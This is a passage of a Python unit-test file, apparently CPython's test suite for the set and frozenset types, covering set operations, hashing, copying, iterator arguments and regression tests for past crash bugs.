self.assertEqual(s.intersection_update(C(p), C(t)), None)
self.assertEqual(s, set('abcba')&set(p)&set(t))
def test_iand(self):
self.s &= set(self.otherword)
for c in (self.word + self.otherword):
if c in self.otherword and c in self.word:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_difference_update(self):
retval = self.s.difference_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if c in self.word and c not in self.otherword:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.difference_update, check_pass_thru())
self.assertRaises(TypeError, self.s.difference_update, [[]])
self.assertRaises(TypeError, self.s.symmetric_difference_update, [[]])
for p, q in (('cdc', 'ab'), ('efgfe', 'abc'), ('ccb', 'a'), ('ef', 'abc')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.difference_update(C(p)), None)
self.assertEqual(s, set(q))
s = self.thetype('abcdefghih')
s.difference_update()
self.assertEqual(s, self.thetype('abcdefghih'))
s = self.thetype('abcdefghih')
s.difference_update(C('aba'))
self.assertEqual(s, self.thetype('cdefghih'))
s = self.thetype('abcdefghih')
s.difference_update(C('cdc'), C('aba'))
self.assertEqual(s, self.thetype('efghih'))
def test_isub(self):
self.s -= set(self.otherword)
for c in (self.word + self.otherword):
if c in self.word and c not in self.otherword:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_symmetric_difference_update(self):
retval = self.s.symmetric_difference_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if (c in self.word) ^ (c in self.otherword):
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.symmetric_difference_update, check_pass_thru())
self.assertRaises(TypeError, self.s.symmetric_difference_update, [[]])
for p, q in (('cdc', 'abd'), ('efgfe', 'abcefg'), ('ccb', 'a'), ('ef', 'abcef')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.symmetric_difference_update(C(p)), None)
self.assertEqual(s, set(q))
def test_ixor(self):
self.s ^= set(self.otherword)
for c in (self.word + self.otherword):
if (c in self.word) ^ (c in self.otherword):
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_inplace_on_self(self):
t = self.s.copy()
t |= t
self.assertEqual(t, self.s)
t &= t
self.assertEqual(t, self.s)
t -= t
self.assertEqual(t, self.thetype())
t = self.s.copy()
t ^= t
self.assertEqual(t, self.thetype())
def test_weakref(self):
s = self.thetype('gallahad')
p = weakref.proxy(s)
self.assertEqual(str(p), str(s))
s = None
self.assertRaises(ReferenceError, str, p)
def test_rich_compare(self):
class TestRichSetCompare:
def __gt__(self, some_set):
self.gt_called = True
return False
def __lt__(self, some_set):
self.lt_called = True
return False
def __ge__(self, some_set):
self.ge_called = True
return False
def __le__(self, some_set):
self.le_called = True
return False
# This first tries the builtin rich set comparison, which doesn't know
# how to handle the custom object. Upon returning NotImplemented, the
# corresponding comparison on the right object is invoked.
myset = {1, 2, 3}
myobj = TestRichSetCompare()
myset < myobj
self.assertTrue(myobj.gt_called)
myobj = TestRichSetCompare()
myset > myobj
self.assertTrue(myobj.lt_called)
myobj = TestRichSetCompare()
myset <= myobj
self.assertTrue(myobj.ge_called)
myobj = TestRichSetCompare()
myset >= myobj
self.assertTrue(myobj.le_called)
@unittest.skipUnless(hasattr(set, "test_c_api"),
'C API test only available in a debug build')
def test_c_api(self):
self.assertEqual(set().test_c_api(), True)
class SetSubclass(set):
pass
class TestSetSubclass(TestSet):
thetype = SetSubclass
basetype = set
class SetSubclassWithKeywordArgs(set):
def __init__(self, iterable=[], newarg=None):
set.__init__(self, iterable)
class TestSetSubclassWithKeywordArgs(TestSet):
def test_keywords_in_subclass(self):
'SF bug #1486663 -- this used to erroneously raise a TypeError'
SetSubclassWithKeywordArgs(newarg=1)
class TestFrozenSet(TestJointOps, unittest.TestCase):
thetype = frozenset
basetype = frozenset
def test_init(self):
s = self.thetype(self.word)
s.__init__(self.otherword)
self.assertEqual(s, set(self.word))
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertEqual(id(s), id(t))
def test_hash(self):
self.assertEqual(hash(self.thetype('abcdeb')),
hash(self.thetype('ebecda')))
# make sure that all permutations give the same hash value
n = 100
seq = [randrange(n) for i in range(n)]
results = set()
for i in range(200):
shuffle(seq)
results.add(hash(self.thetype(seq)))
self.assertEqual(len(results), 1)
def test_copy(self):
dup = self.s.copy()
self.assertEqual(id(self.s), id(dup))
def test_frozen_as_dictkey(self):
seq = list(range(10)) + list('abcdefg') + ['apple']
key1 = self.thetype(seq)
key2 = self.thetype(reversed(seq))
self.assertEqual(key1, key2)
self.assertNotEqual(id(key1), id(key2))
d = {}
d[key1] = 42
self.assertEqual(d[key2], 42)
def test_hash_caching(self):
f = self.thetype('abcdcda')
self.assertEqual(hash(f), hash(f))
def test_hash_effectiveness(self):
n = 13
hashvalues = set()
addhashvalue = hashvalues.add
elemmasks = [(i+1, 1<<i) for i in range(n)]
for i in range(2**n):
addhashvalue(hash(frozenset([e for e, m in elemmasks if m&i])))
self.assertEqual(len(hashvalues), 2**n)
def zf_range(n):
# https://en.wikipedia.org/wiki/Set-theoretic_definition_of_natural_numbers
nums = [frozenset()]
for i in range(n-1):
num = frozenset(nums)
nums.append(num)
return nums[:n]
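            # Illustration (editorial note): zf_range(3) yields the first three
            # von Neumann-style naturals encoded as frozensets:
            # 0 = frozenset(), 1 = {0}, 2 = {0, 1}.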
def powerset(s):
for i in range(len(s)+1):
yield from map(frozenset, itertools.combinations(s, i))
for n in range(18):
t = 2 ** n
mask = t - 1
for nums in (range, zf_range):
u = len({h & mask for h in map(hash, powerset(nums(n)))})
self.assertGreater(4*u, t)
class FrozenSetSubclass(frozenset):
pass
class TestFrozenSetSubclass(TestFrozenSet):
thetype = FrozenSetSubclass
basetype = frozenset
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertNotEqual(id(s), id(t))
def test_copy(self):
dup = self.s.copy()
self.assertNotEqual(id(self.s), id(dup))
def test_nested_empty_constructor(self):
s = self.thetype()
t = self.thetype(s)
self.assertEqual(s, t)
def test_singleton_empty_frozenset(self):
Frozenset = self.thetype
f = frozenset()
F = Frozenset()
efs = [Frozenset(), Frozenset([]), Frozenset(()), Frozenset(''),
Frozenset(), Frozenset([]), Frozenset(()), Frozenset(''),
Frozenset(range(0)), Frozenset(Frozenset()),
Frozenset(frozenset()), f, F, Frozenset(f), Frozenset(F)]
# All empty frozenset subclass instances should have different ids
self.assertEqual(len(set(map(id, efs))), len(efs))
# Tests taken from test_sets.py =============================================
empty_set = set()
#==============================================================================
class TestBasicOps:
def test_repr(self):
if self.repr is not None:
self.assertEqual(repr(self.set), self.repr)
def check_repr_against_values(self):
text = repr(self.set)
self.assertTrue(text.startswith('{'))
self.assertTrue(text.endswith('}'))
result = text[1:-1].split(', ')
result.sort()
sorted_repr_values = [repr(value) for value in self.values]
sorted_repr_values.sort()
self.assertEqual(result, sorted_repr_values)
def test_length(self):
self.assertEqual(len(self.set), self.length)
def test_self_equality(self):
self.assertEqual(self.set, self.set)
def test_equivalent_equality(self):
self.assertEqual(self.set, self.dup)
def test_copy(self):
self.assertEqual(self.set.copy(), self.dup)
def test_self_union(self):
result = self.set | self.set
self.assertEqual(result, self.dup)
def test_empty_union(self):
result = self.set | empty_set
self.assertEqual(result, self.dup)
def test_union_empty(self):
result = empty_set | self.set
self.assertEqual(result, self.dup)
def test_self_intersection(self):
result = self.set & self.set
self.assertEqual(result, self.dup)
def test_empty_intersection(self):
result = self.set & empty_set
self.assertEqual(result, empty_set)
def test_intersection_empty(self):
result = empty_set & self.set
self.assertEqual(result, empty_set)
def test_self_isdisjoint(self):
result = self.set.isdisjoint(self.set)
self.assertEqual(result, not self.set)
def test_empty_isdisjoint(self):
result = self.set.isdisjoint(empty_set)
self.assertEqual(result, True)
def test_isdisjoint_empty(self):
result = empty_set.isdisjoint(self.set)
self.assertEqual(result, True)
def test_self_symmetric_difference(self):
result = self.set ^ self.set
self.assertEqual(result, empty_set)
def test_empty_symmetric_difference(self):
result = self.set ^ empty_set
self.assertEqual(result, self.set)
def test_self_difference(self):
result = self.set - self.set
self.assertEqual(result, empty_set)
def test_empty_difference(self):
result = self.set - empty_set
self.assertEqual(result, self.dup)
def test_empty_difference_rev(self):
result = empty_set - self.set
self.assertEqual(result, empty_set)
def test_iteration(self):
for v in self.set:
self.assertIn(v, self.values)
setiter = iter(self.set)
self.assertEqual(setiter.__length_hint__(), len(self.set))
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
p = pickle.dumps(self.set, proto)
copy = pickle.loads(p)
self.assertEqual(self.set, copy,
"%s != %s" % (self.set, copy))
def test_issue_37219(self):
with self.assertRaises(TypeError):
set().difference(123)
with self.assertRaises(TypeError):
set().difference_update(123)
#------------------------------------------------------------------------------
class TestBasicOpsEmpty(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "empty set"
self.values = []
self.set = set(self.values)
self.dup = set(self.values)
self.length = 0
self.repr = "set()"
#------------------------------------------------------------------------------
class TestBasicOpsSingleton(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "unit set (number)"
self.values = [3]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 1
self.repr = "{3}"
def test_in(self):
self.assertIn(3, self.set)
def test_not_in(self):
self.assertNotIn(2, self.set)
#------------------------------------------------------------------------------
class TestBasicOpsTuple(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "unit set (tuple)"
self.values = [(0, "zero")]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 1
self.repr = "{(0, 'zero')}"
def test_in(self):
self.assertIn((0, "zero"), self.set)
def test_not_in(self):
self.assertNotIn(9, self.set)
#------------------------------------------------------------------------------
class TestBasicOpsTriple(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "triple set"
self.values = [0, "zero", operator.add]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
self.repr = None
#------------------------------------------------------------------------------
class TestBasicOpsString(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "string set"
self.values = ["a", "b", "c"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
def test_repr(self):
self.check_repr_against_values()
#------------------------------------------------------------------------------
class TestBasicOpsBytes(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "bytes set"
self.values = [b"a", b"b", b"c"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
def test_repr(self):
self.check_repr_against_values()
#------------------------------------------------------------------------------
class TestBasicOpsMixedStringBytes(TestBasicOps, unittest.TestCase):
def setUp(self):
self._warning_filters = warnings_helper.check_warnings()
self._warning_filters.__enter__()
warnings.simplefilter('ignore', BytesWarning)
self.case = "string and bytes set"
self.values = ["a", "b", b"a", b"b"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 4
def tearDown(self):
self._warning_filters.__exit__(None, None, None)
def test_repr(self):
self.check_repr_against_values()
#==============================================================================
def baditer():
raise TypeError
yield True
def gooditer():
yield True
class TestExceptionPropagation(unittest.TestCase):
"""SF 628246: Set constructor should not trap iterator TypeErrors"""
def test_instanceWithException(self):
self.assertRaises(TypeError, set, baditer())
def test_instancesWithoutException(self):
# All of these iterables should load without exception.
set([1,2,3])
set((1,2,3))
set({'one':1, 'two':2, 'three':3})
set(range(3))
set('abc')
set(gooditer())
def test_changingSizeWhileIterating(self):
s = set([1,2,3])
try:
for i in s:
s.update([4])
except RuntimeError:
pass
else:
self.fail("no exception when changing size during iteration")
#==============================================================================
class TestSetOfSets(unittest.TestCase):
def test_constructor(self):
inner = frozenset([1])
outer = set([inner])
element = outer.pop()
self.assertEqual(type(element), frozenset)
outer.add(inner) # Rebuild set of sets with .add method
outer.remove(inner)
self.assertEqual(outer, set()) # Verify that remove worked
outer.discard(inner) # Absence of KeyError indicates working fine
#==============================================================================
class TestBinaryOps(unittest.TestCase):
def setUp(self):
self.set = set((2, 4, 6))
def test_eq(self): # SF bug 643115
self.assertEqual(self.set, set({2:1,4:3,6:5}))
def test_union_subset(self):
result = self.set | set([2])
self.assertEqual(result, set((2, 4, 6)))
def test_union_superset(self):
result = self.set | set([2, 4, 6, 8])
self.assertEqual(result, set([2, 4, 6, 8]))
def test_union_overlap(self):
result = self.set | set([3, 4, 5])
self.assertEqual(result, set([2, 3, 4, 5, 6]))
def test_union_non_overlap(self):
result = self.set | set([8])
self.assertEqual(result, set([2, 4, 6, 8]))
def test_intersection_subset(self):
result = self.set & set((2, 4))
self.assertEqual(result, set((2, 4)))
def test_intersection_superset(self):
result = self.set & set([2, 4, 6, 8])
self.assertEqual(result, set([2, 4, 6]))
def test_intersection_overlap(self):
result = self.set & set([3, 4, 5])
self.assertEqual(result, set([4]))
def test_intersection_non_overlap(self):
result = self.set & set([8])
self.assertEqual(result, empty_set)
def test_isdisjoint_subset(self):
result = self.set.isdisjoint(set((2, 4)))
self.assertEqual(result, False)
def test_isdisjoint_superset(self):
result = self.set.isdisjoint(set([2, 4, 6, 8]))
self.assertEqual(result, False)
def test_isdisjoint_overlap(self):
result = self.set.isdisjoint(set([3, 4, 5]))
self.assertEqual(result, False)
def test_isdisjoint_non_overlap(self):
result = self.set.isdisjoint(set([8]))
self.assertEqual(result, True)
def test_sym_difference_subset(self):
result = self.set ^ set((2, 4))
self.assertEqual(result, set([6]))
def test_sym_difference_superset(self):
result = self.set ^ set((2, 4, 6, 8))
self.assertEqual(result, set([8]))
def test_sym_difference_overlap(self):
result = self.set ^ set((3, 4, 5))
self.assertEqual(result, set([2, 3, 5, 6]))
def test_sym_difference_non_overlap(self):
result = self.set ^ set([8])
self.assertEqual(result, set([2, 4, 6, 8]))
#==============================================================================
class TestUpdateOps(unittest.TestCase):
def setUp(self):
self.set = set((2, 4, 6))
def test_union_subset(self):
self.set |= set([2])
self.assertEqual(self.set, set((2, 4, 6)))
def test_union_superset(self):
self.set |= set([2, 4, 6, 8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_union_overlap(self):
self.set |= set([3, 4, 5])
self.assertEqual(self.set, set([2, 3, 4, 5, 6]))
def test_union_non_overlap(self):
self.set |= set([8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_union_method_call(self):
self.set.update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 3, 4, 5, 6]))
def test_intersection_subset(self):
self.set &= set((2, 4))
self.assertEqual(self.set, set((2, 4)))
def test_intersection_superset(self):
self.set &= set([2, 4, 6, 8])
self.assertEqual(self.set, set([2, 4, 6]))
def test_intersection_overlap(self):
self.set &= set([3, 4, 5])
self.assertEqual(self.set, set([4]))
def test_intersection_non_overlap(self):
self.set &= set([8])
self.assertEqual(self.set, empty_set)
def test_intersection_method_call(self):
self.set.intersection_update(set([3, 4, 5]))
self.assertEqual(self.set, set([4]))
def test_sym_difference_subset(self):
self.set ^= set((2, 4))
self.assertEqual(self.set, set([6]))
def test_sym_difference_superset(self):
self.set ^= set((2, 4, 6, 8))
self.assertEqual(self.set, set([8]))
def test_sym_difference_overlap(self):
self.set ^= set((3, 4, 5))
self.assertEqual(self.set, set([2, 3, 5, 6]))
def test_sym_difference_non_overlap(self):
self.set ^= set([8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_sym_difference_method_call(self):
self.set.symmetric_difference_update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 3, 5, 6]))
def test_difference_subset(self):
self.set -= set((2, 4))
self.assertEqual(self.set, set([6]))
def test_difference_superset(self):
self.set -= set((2, 4, 6, 8))
self.assertEqual(self.set, set([]))
def test_difference_overlap(self):
self.set -= set((3, 4, 5))
self.assertEqual(self.set, set([2, 6]))
def test_difference_non_overlap(self):
self.set -= set([8])
self.assertEqual(self.set, set([2, 4, 6]))
def test_difference_method_call(self):
self.set.difference_update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 6]))
#==============================================================================
class TestMutate(unittest.TestCase):
def setUp(self):
self.values = ["a", "b", "c"]
self.set = set(self.values)
def test_add_present(self):
self.set.add("c")
self.assertEqual(self.set, set("abc"))
def test_add_absent(self):
self.set.add("d")
self.assertEqual(self.set, set("abcd"))
def test_add_until_full(self):
tmp = set()
expected_len = 0
for v in self.values:
tmp.add(v)
expected_len += 1
self.assertEqual(len(tmp), expected_len)
self.assertEqual(tmp, self.set)
def test_remove_present(self):
self.set.remove("b")
self.assertEqual(self.set, set("ac"))
def test_remove_absent(self):
try:
self.set.remove("d")
self.fail("Removing missing element should have raised LookupError")
except LookupError:
pass
def test_remove_until_empty(self):
expected_len = len(self.set)
for v in self.values:
self.set.remove(v)
expected_len -= 1
self.assertEqual(len(self.set), expected_len)
def test_discard_present(self):
self.set.discard("c")
self.assertEqual(self.set, set("ab"))
def test_discard_absent(self):
self.set.discard("d")
self.assertEqual(self.set, set("abc"))
def test_clear(self):
self.set.clear()
self.assertEqual(len(self.set), 0)
def test_pop(self):
popped = {}
while self.set:
popped[self.set.pop()] = None
self.assertEqual(len(popped), len(self.values))
for v in self.values:
self.assertIn(v, popped)
def test_update_empty_tuple(self):
self.set.update(())
self.assertEqual(self.set, set(self.values))
def test_update_unit_tuple_overlap(self):
self.set.update(("a",))
self.assertEqual(self.set, set(self.values))
def test_update_unit_tuple_non_overlap(self):
self.set.update(("a", "z"))
self.assertEqual(self.set, set(self.values + ["z"]))
#==============================================================================
class TestSubsets:
case2method = {"<=": "issubset",
">=": "issuperset",
}
reverse = {"==": "==",
"!=": "!=",
"<": ">",
">": "<",
"<=": ">=",
">=": "<=",
}
def test_issubset(self):
x = self.left
y = self.right
for case in "!=", "==", "<", "<=", ">", ">=":
expected = case in self.cases
# Test the binary infix spelling.
result = eval("x" + case + "y", locals())
self.assertEqual(result, expected)
# Test the "friendly" method-name spelling, if one exists.
if case in TestSubsets.case2method:
method = getattr(x, TestSubsets.case2method[case])
result = method(y)
self.assertEqual(result, expected)
# Now do the same for the operands reversed.
rcase = TestSubsets.reverse[case]
result = eval("y" + rcase + "x", locals())
self.assertEqual(result, expected)
if rcase in TestSubsets.case2method:
method = getattr(y, TestSubsets.case2method[rcase])
result = method(x)
self.assertEqual(result, expected)
#------------------------------------------------------------------------------
class TestSubsetEqualEmpty(TestSubsets, unittest.TestCase):
left = set()
right = set()
name = "both empty"
cases = "==", "<=", ">="
#------------------------------------------------------------------------------
class TestSubsetEqualNonEmpty(TestSubsets, unittest.TestCase):
left = set([1, 2])
right = set([1, 2])
name = "equal pair"
cases = "==", "<=", ">="
#------------------------------------------------------------------------------
class TestSubsetEmptyNonEmpty(TestSubsets, unittest.TestCase):
left = set()
right = set([1, 2])
name = "one empty, one non-empty"
cases = "!=", "<", "<="
#------------------------------------------------------------------------------
class TestSubsetPartial(TestSubsets, unittest.TestCase):
left = set([1])
right = set([1, 2])
name = "one a non-empty proper subset of other"
cases = "!=", "<", "<="
#------------------------------------------------------------------------------
class TestSubsetNonOverlap(TestSubsets, unittest.TestCase):
left = set([1])
right = set([2])
name = "neither empty, neither contains"
cases = "!="
#==============================================================================
class TestOnlySetsInBinaryOps:
def test_eq_ne(self):
# Unlike the others, this is testing that == and != *are* allowed.
self.assertEqual(self.other == self.set, False)
self.assertEqual(self.set == self.other, False)
self.assertEqual(self.other != self.set, True)
self.assertEqual(self.set != self.other, True)
def test_ge_gt_le_lt(self):
self.assertRaises(TypeError, lambda: self.set < self.other)
self.assertRaises(TypeError, lambda: self.set <= self.other)
self.assertRaises(TypeError, lambda: self.set > self.other)
self.assertRaises(TypeError, lambda: self.set >= self.other)
self.assertRaises(TypeError, lambda: self.other < self.set)
self.assertRaises(TypeError, lambda: self.other <= self.set)
self.assertRaises(TypeError, lambda: self.other > self.set)
self.assertRaises(TypeError, lambda: self.other >= self.set)
def test_update_operator(self):
try:
self.set |= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_update(self):
if self.otherIsIterable:
self.set.update(self.other)
else:
self.assertRaises(TypeError, self.set.update, self.other)
def test_union(self):
self.assertRaises(TypeError, lambda: self.set | self.other)
self.assertRaises(TypeError, lambda: self.other | self.set)
if self.otherIsIterable:
self.set.union(self.other)
else:
self.assertRaises(TypeError, self.set.union, self.other)
def test_intersection_update_operator(self):
try:
self.set &= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_intersection_update(self):
if self.otherIsIterable:
self.set.intersection_update(self.other)
else:
self.assertRaises(TypeError,
self.set.intersection_update,
self.other)
def test_intersection(self):
self.assertRaises(TypeError, lambda: self.set & self.other)
self.assertRaises(TypeError, lambda: self.other & self.set)
if self.otherIsIterable:
self.set.intersection(self.other)
else:
self.assertRaises(TypeError, self.set.intersection, self.other)
def test_sym_difference_update_operator(self):
try:
self.set ^= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_sym_difference_update(self):
if self.otherIsIterable:
self.set.symmetric_difference_update(self.other)
else:
self.assertRaises(TypeError,
self.set.symmetric_difference_update,
self.other)
def test_sym_difference(self):
self.assertRaises(TypeError, lambda: self.set ^ self.other)
self.assertRaises(TypeError, lambda: self.other ^ self.set)
if self.otherIsIterable:
self.set.symmetric_difference(self.other)
else:
self.assertRaises(TypeError, self.set.symmetric_difference, self.other)
def test_difference_update_operator(self):
try:
self.set -= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_difference_update(self):
if self.otherIsIterable:
self.set.difference_update(self.other)
else:
self.assertRaises(TypeError,
self.set.difference_update,
self.other)
def test_difference(self):
self.assertRaises(TypeError, lambda: self.set - self.other)
self.assertRaises(TypeError, lambda: self.other - self.set)
if self.otherIsIterable:
self.set.difference(self.other)
else:
self.assertRaises(TypeError, self.set.difference, self.other)
#------------------------------------------------------------------------------
class TestOnlySetsNumeric(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = 19
self.otherIsIterable = False
#------------------------------------------------------------------------------
class TestOnlySetsDict(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = {1:2, 3:4}
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsOperator(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = operator.add
self.otherIsIterable = False
#------------------------------------------------------------------------------
class TestOnlySetsTuple(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = (2, 4, 6)
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsString(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = 'abc'
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsGenerator(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
def gen():
for i in range(0, 10, 2):
yield i
self.set = set((1, 2, 3))
self.other = gen()
self.otherIsIterable = True
#==============================================================================
class TestCopying:
def test_copy(self):
dup = self.set.copy()
dup_list = sorted(dup, key=repr)
set_list = sorted(self.set, key=repr)
self.assertEqual(len(dup_list), len(set_list))
for i in range(len(dup_list)):
self.assertTrue(dup_list[i] is set_list[i])
def test_deep_copy(self):
dup = copy.deepcopy(self.set)
##print type(dup), repr(dup)
dup_list = sorted(dup, key=repr)
set_list = sorted(self.set, key=repr)
self.assertEqual(len(dup_list), len(set_list))
for i in range(len(dup_list)):
self.assertEqual(dup_list[i], set_list[i])
#------------------------------------------------------------------------------
class TestCopyingEmpty(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set()
#------------------------------------------------------------------------------
class TestCopyingSingleton(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set(["hello"])
#------------------------------------------------------------------------------
class TestCopyingTriple(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set(["zero", 0, None])
#------------------------------------------------------------------------------
class TestCopyingTuple(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set([(1, 2)])
#------------------------------------------------------------------------------
class TestCopyingNested(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set([((1, 2), (3, 4))])
#==============================================================================
class TestIdentities(unittest.TestCase):
def setUp(self):
self.a = set('abracadabra')
self.b = set('alacazam')
def test_binopsVsSubsets(self):
a, b = self.a, self.b
self.assertTrue(a - b < a)
self.assertTrue(b - a < b)
self.assertTrue(a & b < a)
self.assertTrue(a & b < b)
self.assertTrue(a | b > a)
self.assertTrue(a | b > b)
self.assertTrue(a ^ b < a | b)
def test_commutativity(self):
a, b = self.a, self.b
self.assertEqual(a&b, b&a)
self.assertEqual(a|b, b|a)
self.assertEqual(a^b, b^a)
if a != b:
self.assertNotEqual(a-b, b-a)
def test_summations(self):
# check that sums of parts equal the whole
a, b = self.a, self.b
self.assertEqual((a-b)|(a&b)|(b-a), a|b)
self.assertEqual((a&b)|(a^b), a|b)
self.assertEqual(a|(b-a), a|b)
self.assertEqual((a-b)|b, a|b)
self.assertEqual((a-b)|(a&b), a)
self.assertEqual((b-a)|(a&b), b)
self.assertEqual((a-b)|(b-a), a^b)
def test_exclusion(self):
# check that inverse operations show non-overlap
a, b, zero = self.a, self.b, set()
self.assertEqual((a-b)&b, zero)
self.assertEqual((b-a)&a, zero)
self.assertEqual((a&b)&(a^b), zero)
# Tests derived from test_itertools.py =======================================
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
from itertools import chain
def L(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_constructor(self):
for cons in (set, frozenset):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(sorted(cons(g(s)), key=repr), sorted(g(s), key=repr))
self.assertRaises(TypeError, cons , X(s))
self.assertRaises(TypeError, cons , N(s))
self.assertRaises(ZeroDivisionError, cons , E(s))
def test_inline_methods(self):
s = set('november')
for data in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5), 'december'):
for meth in (s.union, s.intersection, s.difference, s.symmetric_difference, s.isdisjoint):
for g in (G, I, Ig, L, R):
expected = meth(data)
actual = meth(g(data))
if isinstance(expected, bool):
self.assertEqual(actual, expected)
else:
self.assertEqual(sorted(actual, key=repr), sorted(expected, key=repr))
self.assertRaises(TypeError, meth, X(s))
self.assertRaises(TypeError, meth, N(s))
self.assertRaises(ZeroDivisionError, meth, E(s))
def test_inplace_methods(self):
for data in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5), 'december'):
for methname in ('update', 'intersection_update',
'difference_update', 'symmetric_difference_update'):
for g in (G, I, Ig, S, L, R):
s = set('january')
t = s.copy()
getattr(s, methname)(list(g(data)))
getattr(t, methname)(g(data))
self.assertEqual(sorted(s, key=repr), sorted(t, key=repr))
self.assertRaises(TypeError, getattr(set('january'), methname), X(data))
self.assertRaises(TypeError, getattr(set('january'), methname), N(data))
self.assertRaises(ZeroDivisionError, getattr(set('january'), methname), E(data))
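# Editorial note: the two helper classes below are used by TestWeirdBugs.
# The module-level names be_bad, set2 and dict2 are assigned inside
# test_8420_set_merge(); when be_bad is true, __eq__ mutates the container
# being merged, reproducing the conditions of issue #8420.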
class bad_eq:
def __eq__(self, other):
if be_bad:
set2.clear()
raise ZeroDivisionError
return self is other
def __hash__(self):
return 0
class bad_dict_clear:
def __eq__(self, other):
if be_bad:
dict2.clear()
return self is other
def __hash__(self):
return 0
class TestWeirdBugs(unittest.TestCase):
def test_8420_set_merge(self):
# This used to segfault
global be_bad, set2, dict2
be_bad = False
set1 = {bad_eq()}
set2 = {bad_eq() for i in range(75)}
be_bad = True
self.assertRaises(ZeroDivisionError, set1.update, set2)
be_bad = False
set1 = {bad_dict_clear()}
dict2 = {bad_dict_clear(): None}
be_bad = True
set1.symmetric_difference_update(dict2)
def test_iter_and_mutate(self):
# Issue #24581
s = set(range(100))
s.clear()
s.update(range(100))
si = iter(s)
s.clear()
a = list(range(100))
s.update(range(100))
list(si)
def test_merge_and_mutate(self):
class X:
def __hash__(self):
return hash(0)
def __eq__(self, o):
other.clear()
return False
other = set()
other = {X() for i in range(10)}
s = {0}
s.update(other)
# Application tests (based on David Eppstein's graph recipes) ================================
def powerset(U):
"""Generates all subsets of a set or sequence U."""
U = iter(U)
try:
x = frozenset([next(U)])
for S in powerset(U):
yield S
yield S | x
except StopIteration:
yield frozenset()
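# Worked example (editorial illustration): powerset() yields every subset of
# its argument as a frozenset, e.g. list(powerset('ab')) produces
# frozenset(), {'a'}, {'b'} and {'a', 'b'} -- 2**2 subsets in recursion order.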
def cube(n):
